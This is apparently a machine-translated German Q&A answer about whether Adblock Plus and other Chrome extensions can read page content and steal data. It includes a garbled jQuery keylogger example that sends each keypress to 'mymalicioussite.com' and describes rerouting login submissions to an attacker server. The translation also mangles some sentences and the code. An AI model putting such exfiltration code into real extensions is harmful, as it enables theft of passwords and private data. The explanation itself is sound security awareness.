Update
Nachdem ich darüber nachgedacht habe, muss ich den anderen Antworten darin zustimmen, dass Adblock mehr ist, obwohl es auf Ihre Daten zugreifen kann Wahrscheinlich schützen Sie Ihre Privatsphäre, bevor Sie in sie eindringen. Das eigentliche Risiko sind böswillige Anzeigen, die Sie auffordern, Software auf Ihrem Computer zu installieren. Adblock verhindert dies.
Nachfolgend finden Sie die ursprüngliche, vorsichtige Antwort:
Ja, das ist es vollständig.
Adblock Plus ist eine Browser-Erweiterung / Add-On, entwickelt von einem unabhängigen Entwickler. Adblock kann auf allen Seiten auf das DOM (Dokumentobjektmodell) zugreifen.
AdBlock funktioniert so, dass es ein Skript in Ihren Browser einfügt, der das DOM durchsucht und dann ein hide () für Anzeigen bestimmt.
Dies bedeutet, dass AdBlock (und jede Chrome-Erweiterung mit dieser Berechtigung) auf Ihr DOM zugreifen kann. Adblock kann nicht auf JavaScript-Variablen zugreifen.
Was bedeutet das?
Wenn Sie sich auf einer Website mit sicherer Authentifizierung befinden und ein JavaScript-Objekt mit etwas Privatem wie einem AuthKey vorhanden ist, sind Sie es sicher . AdBlock kann nicht auf JavaScript-Variablen zugreifen.
AdBlock KANN jedoch einen entsprechenden Code ausführen.
$ (Fenster) .onKeyPress (Funktion (e) {$ ('html') ) .append ('<img src =' http: //mymalicioussite.com/stealData/keyPress.png? key = '+ e.keyCode)})
Womit im Wesentlichen alle Schlüssel weitergeleitet werden Sie drücken auf einen Remote-Server.
Dies kann verwendet werden, um Ihr Passwort zu stehlen, was noch schlimmer ist als das Stehlen Ihres Tokens.
Ist AdBlock selbst gefährlich?
Es scheint mir, dass AdBlock nicht übermäßig gefährlich ist, da sich der Entwickler identifiziert hat und von Millionen von Menschen verwendet wird. Wenn es so knifflig wäre wie oben, hätte es wahrscheinlich jemand bemerkt und gepfiffen.
Aber denken Sie nicht, dass Chrome-Erweiterungen absolut sicher sind. Alle können alle Daten sowie andere schädliche Dinge stehlen.
Was kann es sonst noch?
Eine Chrome-Erweiterung kann auch die folgenden Sicherheitsverletzungen ganz trivial ausführen ...
- Leiten Sie den Inhalt aller gelesenen E-Mails oder Seiten an eine Quelle eines Drittanbieters weiter (sofern diese E-Mail unverschlüsselt enthält Anmeldeinformationen, Sie sind kaputt) Wenn Sie sie auf dem Bildschirm sehen können, können auch alle Chrome-Erweiterungen keine Fragen stellen.
- Geben Sie Informationen in ein Feld ein und klicken Sie auf die Schaltfläche "Senden". Senden Sie beispielsweise ein e -mail
- Wenn Sie Ihren Browser geöffnet lassen und die Erweiterung weiß, wie es geht, kann sie über Ihre E-Mail-Oberfläche (Google Mail, Outlook) E-Mails ihrer Wahl an Ihre Kontakte senden. Dies ist trivial.
- Ändern Sie das Skript, das einer Schaltfläche zugeordnet ist, sofern dies ursprünglich in jQuery eingegeben wurde. Beispielsweise kann die Schaltfläche zum Senden Ihrer Anmeldeinformationen an den Server geringfügig geändert werden, um diese Informationen sowohl an den Server als auch an
http: // mymaliciousserver
zu senden. Dies ist trivial.
Update
Es wurde durch Diskussion bestätigt, dass AdBlock Open Source ist. Auf diese Weise sollten Sie AdBlock mehr vertrauen, aber denken Sie daran, dass es immer noch in der Lage ist, diese Dinge zu tun. Ich habe die Quelle überprüft und kann mit Sicherheit sagen, dass ich überhaupt keine Ahnung habe, was los ist.
Quelle: Ich bin ein JavaScript- und Chrome-Erweiterungsentwickler.